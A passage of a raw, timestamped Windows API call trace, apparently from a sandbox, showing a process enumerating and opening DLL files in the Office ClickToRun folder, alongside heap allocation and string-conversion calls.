dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x73428 [0074.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0074.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x736b0 [0074.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73428 | out: hHeap=0x20000) returned 1 [0074.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x736b0 | out: hHeap=0x20000) returned 1 [0074.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.079] AreFileApisANSI () returned 1 [0074.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 100 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0074.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.079] AreFileApisANSI () returned 1 [0074.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0074.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x5a6b8 [0074.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0074.079] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.080] GetFileType (hFile=0x42c) returned 0x1 [0074.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.080] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.080] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.080] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.080] CloseHandle (hObject=0x42c) returned 1 [0074.080] AreFileApisANSI () returned 1 [0074.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0074.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x5a6b8 [0074.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0074.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.081] GetFileType (hFile=0x42c) returned 0x1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.081] CloseHandle (hObject=0x42c) returned 1 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0074.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0074.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0074.082] AreFileApisANSI () returned 1 [0074.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0074.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x5a6b8 [0074.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0074.082] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0074.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.083] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0074.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.084] AreFileApisANSI () returned 1 [0074.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 91 [0074.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0074.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.084] AreFileApisANSI () returned 1 [0074.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0074.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.084] GetFileType (hFile=0x42c) returned 0x1 [0074.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.085] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.085] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.085] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.085] CloseHandle (hObject=0x42c) returned 1 [0074.085] AreFileApisANSI () returned 1 [0074.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0074.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.086] GetFileType (hFile=0x42c) returned 0x1 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.086] CloseHandle (hObject=0x42c) returned 1 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) 